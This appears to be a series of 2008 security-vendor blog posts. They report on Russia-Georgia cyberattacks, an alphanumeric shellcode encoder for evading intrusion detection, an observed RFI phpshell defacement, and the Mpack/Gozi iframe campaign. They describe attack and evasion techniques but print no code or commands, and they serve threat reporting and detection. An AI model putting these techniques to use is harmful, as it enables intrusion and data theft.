A further research made on the recent cyberwarfare between Russia and Georgia comes to enforce our assumptions in our last blog post regarding the identity of the party behind the attacks against Georgia. The research speculates the fact that the series of cyber-attacks were carried out by the Russian government in parallel to conventional military operations. The article could be found at:
http://www.stratfor.com/analysis/georgia_russia_cyberwarfare_angle

Note: membership is required in order to view the above article.

 Recently I published to the Full Disclosure mailing list work regarding Alphanumeric shellcode encoding and detection.

It discusses the methods which attackers may use in order to evade intrusion detection systems, and generic detection possibilities.

To view the original post, follow this link: http://lists.grok.org.uk/pipermail/full-disclosure/2008-August/063632.html

It includes attached an Alphanumeric shellcode encoder and a decoder routine which is very difficult to detect using existing intrusion detection systems but the post discusses the generic detection possibilities of this specific encoder and others (including proof of concept detection code).

Here's a demo of the same shellcode (remote connect-back taken from metaspolit, encoded twice using the encoder.

Notice the beginning of the shellcode (the decoder routine) is different on each execution.

http://www.aladdin.com/csrt/alnum_encoding_decoding.avi 

In this entry, I’m going to demonstrate an example of an RFI attack which we were witness to all of its stages. We came across this incident during a CSRT routine monitoring and inspection of the world of underground IRC networks.

Hackers take advantage of IRC to operate servers devoted for scanning the Web for websites vulnerable to RFI or SQL Injection, and for trading credit card numbers and Paypal accounts. An RFI attack (Remote File Inclusion) is the act of intrusion to websites from a remote computer by running the hackers own PHP code on a vulnerable website.

In a certain IRC channel, a bot which began scanning for websites vulnerable to RFI attacks caught our attention. The bot then found a bunch of websites ripe for an RFI attack.

To lay their hands on one of these vulnerable websites, the hackers used a phpshell page that provides multiple functions under their control. The php shell provides functions such as browsing the files on the server hosting the website; other functions include: execute commands, file uploading to server, and other operations that facilitate the process of taking control over the target website.

We were not surprised to see the victim website already defaced a few minutes later. Two days later, the website owners stated that their site has been hacked in the following statement:

Currently, it seems to us that the owners of the above website have regained their website and fixed that RFI vulnerability which the hackers have exploited.

eSafe CSRT has recently discovered a new massive Web attack where a malicious iframe pointing to a remote exploit is being planted on compromised legitimate websites. The iframe points to an Mpack exploit kit, detected by eSafe as JS.Agent.hdd, hosted on a Chinese server. The exploit kit in its turn downloads a new improved version of the Russian Trojan horse called Gozi Trojan, which is detected by eSafe as Win32.Agent.gjs.

The Gozi Trojan is designed to steal sensitive information and to send it to a predefined address. It has been noticed that this new version of Gozi Trojan transfers the stolen data to an IP address located on Malaysia.

The following TCP Stream shows the Gozi Trojan in action:

More than 600 legitimate websites have fallen victim to this attack. The list includes a popular pro-Israel website and a private banking service website located in the Cayman Islands. Visiting the bank’s main page or any of the compromised websites triggers the exploit and ends up downloading the Gozi Trojan into the victim’s system.

According to numerous media sources, security firm Trend Micro has confirmed that a number of webpages on its Japanese and English-language websites were compromised by hackers on Sunday, March 9. This attack was part of a widespread web attack launched on websites across the world.

The attackers planted an invisible malicious IFrame tag into the compromised webpages in order to redirect the users, using JavaScript, to a website located in China that served up malware.

Trend Micro has discovered the problem on Wednesday 12 March and replaced affected pages with a message that says: “This page is temporarily shut down for emergency maintenance”.

It has not yet been revealed how the webpages on Trend Micro’s website were hacked by the attackers; however, all these webpages seem to use Microsoft's Active Server Page (ASP) technology. The attackers probably have exploited a vulnerability or a software bug in ASP to hack the webpages.

Trend Micro reported on its website that web surfers could be infected by the malware, which they named JS_DLOADER.TZE, either by accessing one of the infected webpages or clicking a URL link embedded in the malware’s name. They have recommended that visitors to their site check that their computers are not infected.